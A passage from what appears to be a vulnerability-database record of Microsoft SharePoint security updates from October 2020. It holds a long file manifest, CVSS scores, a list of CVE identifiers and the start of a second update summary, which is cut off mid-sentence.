ta_viewbdcentity.aspx| | 16454| 15-Sep-20| 11:36 \ntbdcvwli.aspx_tenantadmin| ta_viewbdclobsysteminstances.aspx| | 10289| 15-Sep-20| 11:36 \ntbdcvwlb.aspx_tenantadmin| ta_viewbdclobsystems.aspx| | 13386| 15-Sep-20| 11:36 \nvsitecp.aspx_tenantadmin| ta_viewsitecollectionpropertiesdialog.aspx| | 6189| 15-Sep-20| 11:36 \ndefault.aspx_tenantadmin| default.aspx| | 3882| 15-Sep-20| 11:36 \nonet.xml_tenantadmin| onet.xml| | 5726| 15-Sep-20| 11:36 \nthread.xsl| thread.xsl| | 34542| 15-Sep-20| 11:36 \nusercode.xsd| usercode.xsd| | 4293| 15-Sep-20| 11:36 \nvalidapp.xml| validappendpoints.xml| | 15837| 15-Sep-20| 11:36 \nvwstyles.xsl| vwstyles.xsl| | 130790| 15-Sep-20| 11:36 \nwefman.xsd| wefextensionmanifestschema.xsd| | 51975| 15-Sep-20| 11:36 \nwefma1_1.xsd| wefextensionmanifestschema1_1.xsd| | 57288| 15-Sep-20| 11:36 \nbacklink.aspx_webpagelib| backlinks.aspx| | 4069| 15-Sep-20| 11:36 \ncrtv4pgs.asx| createv4pageslib.aspx| | 3584| 15-Sep-20| 11:36 \ncreatweb.asx| createwebpage.aspx| | 10792| 15-Sep-20| 11:36 \nrecentwp.asx| recentwikipages.aspx| | 3790| 15-Sep-20| 11:36 \nversdiff.aspx_webpagelib| versiondiff.aspx| | 5692| 15-Sep-20| 11:36 \nwikiredr.aspx| wikiredirect.aspx| | 1123| 15-Sep-20| 11:36 \nonet.xml_wiki| onet.xml| | 8372| 15-Sep-20| 11:36 \nwfaction.xsd| workflowactions.xsd| | 14033| 15-Sep-20| 11:36 \nwss.xsd| wss.xsd| | 112463| 15-Sep-20| 11:36 \nbase.xml| base.xml| | 21747| 15-Sep-20| 11:36 \nsts.xml| sts.xml| | 14413| 15-Sep-20| 11:36 \nwssadmin.xml| wssadmin.xml| | 9317| 15-Sep-20| 11:36 \nresqmax.xml_0001| resourcequotamaximum.xml| | 565| 15-Sep-20| 11:36 \nresqwarn.xml_0001| resourcequotawarning.xml| | 563| 15-Sep-20| 11:36 \nowstimer.exe_0001| owstimer.exe| 15.0.4971.1000| 80608| 15-Sep-20| 11:36 \nowstimer.exe.config| owstimer.exe.config| | 481| 15-Sep-20| 11:36 \ntraceman.exe| wsstracing.exe| 15.0.4569.1501| 115904| 15-Sep-20| 11:36 \nspwriter.exe_0001| spwriter.exe| 15.0.4971.1000| 50944| 15-Sep-20| 11:36 \nstswel.dll| stswel.dll| 15.0.5285.1000| 3912600| 15-Sep-20| 11:36 \nstswfacb.dll| microsoft.sharepoint.workflowactions.dll| 15.0.4857.1000| 318728| 15-Sep-20| 11:36 \nstswfact.dll| microsoft.sharepoint.workflowactions.dll| 15.0.4857.1000| 318728| 15-Sep-20| 11:36 \nstswfaci.dll| microsoft.sharepoint.workflowactions.intl.dll| 15.0.4420.1017| 23200| 15-Sep-20| 11:36 \nisswfresources.resx| resources.resx| | 2072| 15-Sep-20| 11:36 \nisswffeature.xml| feature.xml| | 465| 15-Sep-20| 11:36 \nissuetracking.xml| issuetracking.xml| | 749| 15-Sep-20| 11:36 \nsts.workflows.dll| microsoft.sharepoint.workflows.dll| 15.0.4507.1000| 63168| 15-Sep-20| 11:36 \nworkflows_intl.dll| microsoft.sharepoint.workflows.intl.dll| 15.0.5267.1000| 15752| 15-Sep-20| 11:36 \nie50up.debug.js| ie50up.debug.js| | 152255| 15-Sep-20| 11:36 \nie50up.js| ie50up.js| | 80551| 15-Sep-20| 11:36 \nie50up.xml| ie50up.xml| | 65| 15-Sep-20| 11:36 \nie55up.debug.js| ie55up.debug.js| | 151449| 15-Sep-20| 11:36 \nie55up.js| ie55up.js| | 80012| 15-Sep-20| 11:36 \nie55up.xml| ie55up.xml| | 65| 15-Sep-20| 11:36 \nnon_ie.debug.js| non_ie.debug.js| | 101533| 15-Sep-20| 11:36 \nnon_ie.js| non_ie.js| | 59623| 15-Sep-20| 11:36 \nnon_ie.xml| non_ie.xml| | 65| 15-Sep-20| 11:36 \nbpstd.debug.js| bpstd.debug.js| | 7637| 15-Sep-20| 11:36 \nbpstd.js| bpstd.js| | 4356| 15-Sep-20| 11:36 \nbpstd.xml| bpstd.xml| | 65| 15-Sep-20| 11:36 \nctp.debug.js| ctp.debug.js| | 7406| 15-Sep-20| 11:36 \nctp.js| ctp.js| | 3934| 15-Sep-20| 11:36 \nctp.xml| ctp.xml| | 65| 15-Sep-20| 11:36 \ncvtp.debug.js| cvtp.debug.js| | 4529| 15-Sep-20| 11:36 \ncvtp.js| cvtp.js| | 2412| 15-Sep-20| 11:36 \ncvtp.xml| cvtp.xml| | 65| 15-Sep-20| 11:36 \nitp.debug.js| itp.debug.js| | 12586| 15-Sep-20| 11:36 \nitp.js| itp.js| | 9525| 15-Sep-20| 11:36 \nitp.xml| itp.xml| | 65| 15-Sep-20| 11:36 \nxtp.debug.js| xtp.debug.js| | 2979| 15-Sep-20| 11:36 \nxtp.js| xtp.js| | 1491| 15-Sep-20| 11:36 \nsts_sandbox.dll| microsoft.sharepoint.sandbox.dll| 15.0.5277.1000| 180112| 15-Sep-20| 11:36 \naddrbook.gif| addressbook.gif| | 908| 15-Sep-20| 09:58 \ncalview.gif| calview.gif| | 1615| 15-Sep-20| 09:58 \nchecknames.gif| checknames.gif| | 908| 15-Sep-20| 09:58 \nganttvw.gif| ganttview.gif| | 1625| 15-Sep-20| 09:58 \ngrid.gif| grid.gif| | 1610| 15-Sep-20| 09:58 \nicaccdb.gif| icaccdb.gif| | 231| 15-Sep-20| 09:57 \nicaccde.gif| icaccde.gif| | 222| 15-Sep-20| 09:58 \nicbmp.gif| icbmp.gif| | 355| 15-Sep-20| 09:57 \nicdoc.gif| icdoc.gif| | 231| 15-Sep-20| 09:57 \nicdocm.gif| icdocm.gif| | 236| 15-Sep-20| 09:58 \nicdocset.gif| icdocset.gif| | 221| 15-Sep-20| 09:57 \nicdocx.gif| icdocx.gif| | 224| 15-Sep-20| 09:58 \nicdot.gif| icdot.gif| | 223| 15-Sep-20| 09:57 \nicdotm.gif| icdotm.gif| | 235| 15-Sep-20| 09:58 \nicdotx.gif| icdotx.gif| | 221| 15-Sep-20| 09:58 \nicgif.gif| icgif.gif| | 220| 15-Sep-20| 09:57 \nichtmdoc.gif| ichtmdoc.gif| | 229| 15-Sep-20| 09:57 \nichtmppt.gif| ichtmppt.gif| | 227| 15-Sep-20| 09:57 \nichtmpub.gif| ichtmpub.gif| | 227| 15-Sep-20| 09:57 \nichtmxls.gif| ichtmxls.gif| | 239| 15-Sep-20| 09:57 \nicinfopathgeneric.gif| icinfopathgeneric.gif| | 216| 15-Sep-20| 09:58 \nicjfif.gif| icjfif.gif| | 214| 15-Sep-20| 09:57 \nicjpe.gif| icjpe.gif| | 214| 15-Sep-20| 09:57 \nicjpeg.gif| icjpeg.gif| | 214| 15-Sep-20| 09:57 \nicjpg.gif| icjpg.gif| | 214| 15-Sep-20| 09:57 \nicmhtpub.gif| icmhtpub.gif| | 225| 15-Sep-20| 09:58 \nicmpd.gif| icmpd.gif| | 218| 15-Sep-20| 09:57 \nicmpp.gif| icmpp.gif| | 222| 15-Sep-20| 09:57 \nicmpt.gif| icmpt.gif| | 221| 15-Sep-20| 09:57 \nicodp.gif| icodp.gif| | 354| 15-Sep-20| 09:58 \nicods.gif| icods.gif| | 369| 15-Sep-20| 09:58 \nicodt.gif| icodt.gif| | 358| 15-Sep-20| 09:58 \nicone.gif| icone.gif| | 215| 15-Sep-20| 09:57 \niconp.gif| iconp.gif| | 223| 15-Sep-20| 09:58 \nicont.gif| icont.gif| | 216| 15-Sep-20| 09:58 \nicpng.gif| icpng.gif| | 349| 15-Sep-20| 09:57 \nicpot.gif| icpot.gif| | 164| 15-Sep-20| 09:57 \nicpotm.gif| icpotm.gif| | 233| 15-Sep-20| 09:58 \nicpotx.gif| icpotx.gif| | 220| 15-Sep-20| 09:58 \nicppt.gif| icppt.gif| | 168| 15-Sep-20| 09:57 \nicpptm.gif| icpptm.gif| | 236| 15-Sep-20| 09:58 \nicpptx.gif| icpptx.gif| | 222| 15-Sep-20| 09:58 \nicpub.gif| icpub.gif| | 221| 15-Sep-20| 09:57 \nictif.gif| ictif.gif| | 355| 15-Sep-20| 09:57 \nictiff.gif| ictiff.gif| | 355| 15-Sep-20| 09:57 \nicvdw.gif| icvdw.gif| | 219| 15-Sep-20| 09:57 \nicvdx.gif| icvdx.gif| | 231| 15-Sep-20| 09:57 \nicvidset.gif| icvidset.gif| | 92| 15-Sep-20| 09:57 \nicvisiogeneric.gif| icvisiogeneric.gif| | 231| 15-Sep-20| 09:58 \nicvsd.gif| icvsd.gif| | 231| 15-Sep-20| 09:57 \nicvsdm.gif| icvsdm.gif| | 231| 15-Sep-20| 09:57 \nicvsdx.gif| icvsdx.gif| | 231| 15-Sep-20| 09:57 \nicvsl.gif| icvsl.gif| | 211| 15-Sep-20| 09:57 \nicvss.gif| icvss.gif| | 163| 15-Sep-20| 09:57 \nicvssm.gif| icvssm.gif| | 163| 15-Sep-20| 09:57 \nicvssx.gif| icvssx.gif| | 163| 15-Sep-20| 09:57 \nicvst.gif| icvst.gif| | 228| 15-Sep-20| 09:57 \nicvstm.gif| icvstm.gif| | 228| 15-Sep-20| 09:57 \nicvstx.gif| icvstx.gif| | 228| 15-Sep-20| 09:57 \nicvsx.gif| icvsx.gif| | 163| 15-Sep-20| 09:57 \nicvtx.gif| icvtx.gif| | 228| 15-Sep-20| 09:57 \nicxddoc.gif| icxddoc.gif| | 220| 15-Sep-20| 09:57 \nicxls.gif| icxls.gif| | 236| 15-Sep-20| 09:57 \nicxlsb.gif| icxlsb.gif| | 237| 15-Sep-20| 09:58 \nicxlsm.gif| icxlsm.gif| | 352| 15-Sep-20| 09:58 \nicxlsx.gif| icxlsx.gif| | 236| 15-Sep-20| 09:58 \nicxlt.gif| icxlt.gif| | 229| 15-Sep-20| 09:57 \nicxltm.gif| icxltm.gif| | 352| 15-Sep-20| 09:58 \nicxltx.gif| icxltx.gif| | 231| 15-Sep-20| 09:58 \nicxsn.gif| icxsn.gif| | 214| 15-Sep-20| 09:58 \nlg_accdb.gif| lg_icaccdb.gif| | 471| 15-Sep-20| 09:58 \nlg_accdb.png| lg_icaccdb.png| | 1634| 15-Sep-20| 09:58 \nlg_accde.gif| lg_icaccde.gif| | 479| 15-Sep-20| 09:58 \nlg_bmp.gif| lg_icbmp.gif| | 604| 15-Sep-20| 09:58 \nlg_gif.gif| lg_icgif.gif| | 501| 15-Sep-20| 09:58 \nlg_htdoc.gif| lg_ichtmdoc.gif| | 510| 15-Sep-20| 09:58 \nlg_htppt.gif| lg_ichtmppt.gif| | 484| 15-Sep-20| 09:58 \nlg_htpub.gif| lg_ichtmpub.gif| | 482| 15-Sep-20| 09:58 \nlg_htxls.gif| lg_ichtmxls.gif| | 504| 15-Sep-20| 09:58 \nlg_jfif.gif| lg_icjfif.gif| | 433| 15-Sep-20| 09:58 \nlg_jpe.gif| lg_icjpe.gif| | 433| 15-Sep-20| 09:58 \nlg_jpeg.gif| lg_icjpeg.gif| | 433| 15-Sep-20| 09:58 \nlg_jpg.gif| lg_icjpg.gif| | 433| 15-Sep-20| 09:58 \nlg_mpd.gif| lg_icmpd.gif| | 355| 15-Sep-20| 09:58 \nlg_mpp.gif| lg_icmpp.gif| | 363| 15-Sep-20| 09:58 \nlg_mpt.gif| lg_icmpt.gif| | 356| 15-Sep-20| 09:58 \nlg_png.gif| lg_icpng.gif| | 600| 15-Sep-20| 09:58 \nlg_pub.gif| lg_icpub.gif| | 462| 15-Sep-20| 09:58 \nlg_rtf.gif| lg_icrtf.gif| | 481| 15-Sep-20| 09:58 \nlg_tif.gif| lg_ictif.gif| | 604| 15-Sep-20| 09:58 \nlg_tiff.gif| lg_ictiff.gif| | 604| 15-Sep-20| 09:58 \nlg_vdx.gif| lg_icvdx.gif| | 540| 15-Sep-20| 09:58 \nlg_vsd.gif| lg_icvsd.gif| | 540| 15-Sep-20| 09:58 \nlg_vsl.gif| lg_icvsl.gif| | 482| 15-Sep-20| 09:58 \nlg_vss.gif| lg_icvss.gif| | 468| 15-Sep-20| 09:58 \nlg_vst.gif| lg_icvst.gif| | 502| 15-Sep-20| 09:58 \nlg_vstx.gif| lg_icvstx.gif| | 502| 15-Sep-20| 09:58 \nlg_vsx.gif| lg_icvsx.gif| | 468| 15-Sep-20| 09:58 \nlg_vtx.gif| lg_icvtx.gif| | 502| 15-Sep-20| 09:58 \nlg_xddo.gif| lg_icxddoc.gif| | 337| 15-Sep-20| 09:58 \nlg_xsn.gif| lg_icxsn.gif| | 323| 15-Sep-20| 09:58 \nopenfold.gif| openfold.gif| | 142| 15-Sep-20| 09:58 \nituser.gif| ituser.gif| | 1595| 15-Sep-20| 11:36 \nblueprintmtpro.eot| blueprintmtpro.eot| | 24734| 15-Sep-20| 09:58 \nblueprintmtpro.svg| blueprintmtpro.svg| | 105256| 15-Sep-20| 09:58 \nblueprintmtpro.ttf| blueprintmtpro.ttf| | 49468| 15-Sep-20| 09:58 \nblueprintmtpro.woff| blueprintmtpro.woff| | 31724| 15-Sep-20| 09:58 \nblueprintmtprolarge.png| blueprintmtprolarge.png| | 1563| 15-Sep-20| 09:58 \nblueprintmtprosmall.png| blueprintmtprosmall.png| | 1326| 15-Sep-20| 09:58 \ncalibri.eot| calibri.eot| | 167788| 15-Sep-20| 09:58 \ncalibri.svg| calibri.svg| | 365292| 15-Sep-20| 09:58 \ncalibri.ttf| calibri.ttf| | 350124| 15-Sep-20| 09:58 \ncalibri.woff| calibri.woff| | 184156| 15-Sep-20| 09:58 \ncalibrilarge.png| calibrilarge.png| | 1318| 15-Sep-20| 09:58 \ncalibrismall.png| calibrismall.png| | 1170| 15-Sep-20| 09:58 \ncenturygothic.eot| centurygothic.eot| | 60600| 15-Sep-20| 09:58 \ncenturygothic.svg| centurygothic.svg| | 165961| 15-Sep-20| 09:58 \ncenturygothic.ttf| centurygothic.ttf| | 124584| 15-Sep-20| 09:58 \ncenturygothic.woff| centurygothic.woff| | 79732| 15-Sep-20| 09:58 \ncenturygothiclarge.png| centurygothiclarge.png| | 1589| 15-Sep-20| 09:58 \ncenturygothicsmall.png| centurygothicsmall.png| | 1351| 15-Sep-20| 09:58 \ncorbel.eot| corbel.eot| | 96453| 15-Sep-20| 09:58 \ncorbel.svg| corbel.svg| | 185947| 15-Sep-20| 09:58 \ncorbel.ttf| corbel.ttf| | 200316| 15-Sep-20| 09:58 \ncorbel.woff| corbel.woff| | 106184| 15-Sep-20| 09:58 \ncorbellarge.png| corbellarge.png| | 1351| 15-Sep-20| 09:58 \ncorbelsmall.png| corbelsmall.png| | 1171| 15-Sep-20| 09:58 \nimpact.eot| impact.eot| | 56550| 15-Sep-20| 09:58 \nimpact.svg| impact.svg| | 162607| 15-Sep-20| 09:58 \nimpact.ttf| impact.ttf| | 129012| 15-Sep-20| 09:58 \nimpact.woff| impact.woff| | 76992| 15-Sep-20| 09:58 \nimpactlarge.png| impactlarge.png| | 1304| 15-Sep-20| 09:58 \nimpactsmall.png| impactsmall.png| | 1150| 15-Sep-20| 09:58 \nshellicons.eot| shellicons.eot| | 47960| 15-Sep-20| 11:36 \nshellicons.svg| shellicons.svg| | 57730| 15-Sep-20| 11:36 \nshellicons.ttf| shellicons.ttf| | 47768| 15-Sep-20| 11:36 \nshellicons.woff| shellicons.woff| | 26452| 15-Sep-20| 11:36 \ntypewriterelite.eot| typewriterelite.eot| | 27328| 15-Sep-20| 09:58 \ntypewriterelite.svg| typewriterelite.svg| | 77944| 15-Sep-20| 09:58 \ntypewriterelite.ttf| typewriterelite.ttf| | 51708| 15-Sep-20| 09:58 \ntypewriterelite.woff| typewriterelite.woff| | 30976| 15-Sep-20| 09:58 \ntypewriterelitelarge.png| typewriterelitelarge.png| | 1548| 15-Sep-20| 09:58 \ntypewriterelitesmall.png| typewriterelitesmall.png| | 1296| 15-Sep-20| 09:58 \nhelp.xml| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1025| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1026| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1029| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1030| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1032| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1033| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1035| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1037| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1038| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1043| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1044| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1045| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1048| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1050| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1051| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1053| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1054| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1055| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1057| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1058| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1060| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1061| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1062| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1063| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1066| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1081| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1086| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_1087| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_2070| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nwsshelp.xml_2074| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 15-Sep-20| 11:36 \nicvsdm.gif_14| icvsdm.gif| | 1290| 15-Sep-20| 11:36 \nicvsdx.gif_14| icvsdx.gif| | 1288| 15-Sep-20| 11:36 \nlg_icvsdm.gif_14| lg_icvsdm.gif| | 577| 15-Sep-20| 11:36 \nlg_icvsdx.gif_14| lg_icvsdx.gif| | 540| 15-Sep-20| 11:36 \npickerhierarchycontrol.js_14| pickerhierarchycontrol.js| | 126114| 15-Sep-20| 11:36 \nfldswss3.xml_14| fieldswss3.xml| | 50728| 15-Sep-20| 11:36 \ndispform.aspx_piclib_14| dispform.aspx| | 14311| 15-Sep-20| 11:36 \nmicrosoft.sharepoint.client.silverlight.dll_14| microsoft.sharepoint.client.silverlight.dll| 14.0.7006.1000| 273016| 15-Sep-20| 11:36 \nmicrosoft.sharepoint.client.silverlight.runtime.dll_14| microsoft.sharepoint.client.silverlight.runtime.dll| 14.0.7007.1000| 146040| 15-Sep-20| 11:36 \nblog.xsl_14| blog.xsl| | 40342| 15-Sep-20| 11:36 \nviewcategory.asp_blog_categories_14| viewcategory.aspx| | 13786| 15-Sep-20| 11:36 \nschema.xml_blog_comments_14| schema.xml| | 39634| 15-Sep-20| 11:36 \nviewcomment.asp_blog_comments_14| viewcomment.aspx| | 13786| 15-Sep-20| 11:36 \nviewpost.asp_blog_posts_14| viewpost.aspx| | 13786| 15-Sep-20| 11:36 \ndmslstdispform_aspx_14| dispform.aspx| | 13786| 15-Sep-20| 11:36 \ndepl.xsd_14| deploymentmanifest.xsd| | 74297| 15-Sep-20| 11:36 \ndocicon.xml_14| docicon.xml| | 14475| 15-Sep-20| 11:36 \nfldtypes.xsl_14| fldtypes.xsl| | 128231| 15-Sep-20| 11:36 \ndatepicker.debug.js_14| datepicker.debug.js| | 30848| 15-Sep-20| 11:36 \ndatepick.js_14| datepicker.js| | 20413| 15-Sep-20| 11:36 \nentityeditor.debug.js_14| entityeditor.debug.js| | 59260| 15-Sep-20| 11:36 \nentityeditor.js_14| entityeditor.js| | 38002| 15-Sep-20| 11:36 \ninplview.debug.js_14| inplview.debug.js| | 57512| 15-Sep-20| 11:36 \ninplview.js_14| inplview.js| | 39415| 15-Sep-20| 11:36 \njsgrid.debug.js_14| jsgrid.debug.js| | 785068| 15-Sep-20| 11:36 \njsgrid.js_14| jsgrid.js| | 400019| 15-Sep-20| 11:36 \nsp.debug.js_14| sp.debug.js| | 575930| 15-Sep-20| 11:36 \nsp.js_14| sp.js| | 390757| 15-Sep-20| 11:36 \nsp.ribbon.debug.js_14| sp.ribbon.debug.js| | 325227| 15-Sep-20| 11:36 \nsp.runtime.debug.js_14| sp.runtime.debug.js| | 110347| 15-Sep-20| 11:36 \nsp.runtime.js_14| sp.runtime.js| | 68791| 15-Sep-20| 11:36 \nsp.ui.rte.debug.js_14| sp.ui.rte.debug.js| | 594574| 15-Sep-20| 11:36 \nsp.ui.rte.js_14| sp.ui.rte.js| | 365926| 15-Sep-20| 11:36 \nspgantt.debug.js_14| spgantt.debug.js| | 39173| 15-Sep-20| 11:36 \nspgantt.js_14| spgantt.js| | 19338| 15-Sep-20| 11:36 \ndispform.asx_0071_14| dispform.aspx| | 13786| 15-Sep-20| 11:36 \ndispform.asx_0083_14| dispform.aspx| | 13786| 15-Sep-20| 11:36 \ndispform.asx_0082_14| dispform.aspx| | 13786| 15-Sep-20| 11:36 \ndispform.asx_0072_14| dispform.aspx| | 13786| 15-Sep-20| 11:36 \ndispform.asx_0038_14| dispform.aspx| | 13786| 15-Sep-20| 11:36 \ndispform.asx_0084_14| dispform.aspx| | 13786| 15-Sep-20| 11:36 \ndefformt.asc_14| defaulttemplates.ascx| | 170271| 15-Sep-20| 11:36 \nactredir.asx_14| actionredirect.aspx| | 896| 15-Sep-20| 11:36 \naggsetngs.asx_14| aggregationsettings.aspx| | 8163| 15-Sep-20| 11:36 \nctmark.asx_14| calltrackmark.aspx| | 211| 15-Sep-20| 11:36 \nclcnfm.asx_14| circulationconfirm.aspx| | 216| 15-Sep-20| 11:36 \ncreate.asx_14| create.aspx| | 33257| 15-Sep-20| 11:36 \ndeacfeat.asx_14| deactivatefeature.aspx| | 4240| 15-Sep-20| 11:36 \ndeletemu.asx_14| deletemu.aspx| | 188| 15-Sep-20| 11:36 \nfilter.asx_14| filter.aspx| | 1793| 15-Sep-20| 11:36 \ngbredir.asx_14| groupboardredirect.aspx| | 216| 15-Sep-20| 11:36 \niframe.asx_14| iframe.aspx| | 1494| 15-Sep-20| 11:36 \nlistedit.asx_14| listedit.aspx| | 46078| 15-Sep-20| 11:36 \nmngct.asx_14| managecontenttype.aspx| | 10409| 15-Sep-20| 11:36 \nmngfeat.asx_14| managefeatures.aspx| | 4911| 15-Sep-20| 11:36 \nmngsubwb.asx_14| mngsubwebs.aspx| | 12291| 15-Sep-20| 11:36 \ndefault.asx_mobile_14| default.aspx| | 1513| 15-Sep-20| 11:36 \nmbllogin.asx_mobile_14| mbllogin.aspx| | 5337| 15-Sep-20| 11:36 \nmblwiki.asx_mobile_14| mblwiki.aspx| | 3598| 15-Sep-20| 11:36 \nmblwp.asx_mobile_14| mblwp.aspx| | 3603| 15-Sep-20| 11:36 \npickerdialog.mas_14| pickerdialog.master| | 8739| 15-Sep-20| 11:36 \nrtedlg.mas_14| rtedialog.master| | 3153| 15-Sep-20| 11:36 \npicker.asx_14| picker.aspx| | 8613| 15-Sep-20| 11:36 \npckrrst.asx_14| pickerresult.aspx| | 3| 15-Sep-20| 11:36 \nprjsetng.asx_14| prjsetng.aspx| | 16037| 15-Sep-20| 11:36 \nreqfeat.asx_14| reqfeatures.aspx| | 3750| 15-Sep-20| 11:36 \nsrchrslt.asx_14| searchresults.aspx| | 6013| 15-Sep-20| 11:36 \nsettings.asx_14| settings.aspx| | 9565| 15-Sep-20| 11:36 \nsetwa.asx_14| setwhereabouts.aspx| | 212| 15-Sep-20| 11:36 \nsurvedit.asx_14| survedit.aspx| | 36103| 15-Sep-20| 11:36 \nvwgrpprm.asx_14| viewgrouppermissions.aspx| | 5046| 15-Sep-20| 11:36 \nviewlsts.asx_14| viewlsts.aspx| | 16520| 15-Sep-20| 11:36 \nvwstyles.xsl_14| vwstyles.xsl| | 121144| 15-Sep-20| 11:36 \ncui.debug.js| cui.debug.js| | 646903| 15-Sep-20| 11:36 \ncui.js| cui.js| | 362624| 15-Sep-20| 11:36 \nmicrosoft.web.commandui.dll| microsoft.web.commandui.dll| 15.0.5085.1000| 134976| 16-Sep-20| 12:50 \nmicrosoft.web.commandui.dll_0001| microsoft.web.commandui.dll| 15.0.5085.1000| 134976| 16-Sep-20| 12:50 \nxlsrv.commandui.dll| microsoft.web.commandui.dll| 15.0.5085.1000| 134976| | \n \nInformation about protection and securityProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Foundation 2013: October 13, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16941", "CVE-2020-16942", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16948", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16953"], "modified": "2020-10-13T07:00:00", "id": "KB4486694", "href": "https://support.microsoft.com/en-us/help/4486694", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:20:48", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see the following security advisories:\n\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16941](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16941>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16942>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16944>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16945>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16946>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16948>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-16953](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16953>)\n**Note** To apply this security update, you must have the release version of Microsoft SharePoint Enterprise Server 2016 installed on the computer.This public update delivers Feature Pack 2 for SharePoint Server 2016. Feature 